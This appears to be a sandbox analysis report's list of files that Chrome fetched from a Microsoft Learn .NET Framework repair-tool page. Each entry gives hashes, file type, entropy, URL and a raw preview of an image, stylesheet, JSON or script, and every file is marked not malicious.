                                                                                                                                                                        SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                        MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                        SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                        SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                        SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):18367
                                                                                                                                                                        Entropy (8bit):7.7772261735974215
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                        MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                        SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                        SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                        SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1154
                                                                                                                                                                        Entropy (8bit):4.59126408969148
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                        MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                        SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                        SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                        SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):3130
                                                                                                                                                                        Entropy (8bit):4.790069981348324
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                        MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                        SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                        SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                        SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):15427
                                                                                                                                                                        Entropy (8bit):7.784472070227724
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                        MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                        SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                        SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                        SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):464328
                                                                                                                                                                        Entropy (8bit):5.074669864961383
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                        MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                        SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                        SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                        SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                        Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):195719
                                                                                                                                                                        Entropy (8bit):5.430057012529021
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVli2:Wof3G0NSkNzMeO7z/l3lh
                                                                                                                                                                        MD5:9445D8D43537540BC89651C93A9C3832
                                                                                                                                                                        SHA1:EC3066770D52DB58CB7E44C54C3ABAA40CEB121A
                                                                                                                                                                        SHA-256:586D6261C80CBF8CDEC59DE01F1A1D09B32C04E87431E4333A0BF4D8990C2755
                                                                                                                                                                        SHA-512:F2BB9BB14C24883499AF2FAD35EE95AF7BF3D9B0431D8072C54C9D5946C751E04D952F5AD5D937F6CBC7C56177FA2091A5A6F33318F2907E9D3628C28E7FFC9C
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):18477
                                                                                                                                                                        Entropy (8bit):5.147347768532056
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                        MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                        SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                        SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                        SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):207935
                                                                                                                                                                        Entropy (8bit):5.420780972514107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                        MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                        SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                        SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                        SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                        Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):18477
                                                                                                                                                                        Entropy (8bit):5.147347768532056
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                        MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                        SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                        SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                        SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                        Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):15427
                                                                                                                                                                        Entropy (8bit):7.784472070227724
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                        MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                        SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                        SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                        SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):52717
                                                                                                                                                                        Entropy (8bit):5.462668685745912
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                        MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                        SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                        SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                        SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                        Entropy (8bit):4.241202481433726
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                        MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                        SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                        SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                        SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):1432
                                                                                                                                                                        Entropy (8bit):4.986131881931089
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                        MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                        SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                        SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                        SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                        Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):52717
                                                                                                                                                                        Entropy (8bit):5.462668685745912
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                        MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                        SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                        SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                        SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
